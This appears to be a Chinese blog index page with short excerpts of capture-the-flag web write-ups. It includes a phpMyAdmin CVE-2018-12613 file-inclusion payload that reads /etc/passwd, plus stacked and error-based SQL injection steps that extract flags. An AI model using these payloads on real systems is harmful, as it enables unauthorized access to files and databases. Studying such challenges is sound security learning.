摘要:
phpMyadmin(CVE 2018 12613)后台任意文件包含漏洞 影响版本:4.8.0——4.8.1 payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd 本题payload: 阅读全文
posted @ 2020-04-27 09:10
星火不辍
阅读(849)
评论(0)
推荐(0)
摘要:
堆叠注入 首先查询列数 列数为2 union等关键词被过滤 正常注入无法进行 考虑堆叠注入——使用分号结束上一个语句再叠加其他语句一起执行; 然后 sql 1' and 1=2;desc sql 1'; HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRS 阅读全文
posted @ 2020-04-27 08:50
星火不辍
阅读(655)
评论(0)
推荐(0)
摘要:
本题考查报错注入 注入过程如下所示: 这样只能出来一半的flag,另一半用left()right()语句查询拼接 阅读全文
posted @ 2020-04-27 08:20
星火不辍
阅读(672)
评论(0)
推荐(0)
浙公网安备 33010602011771号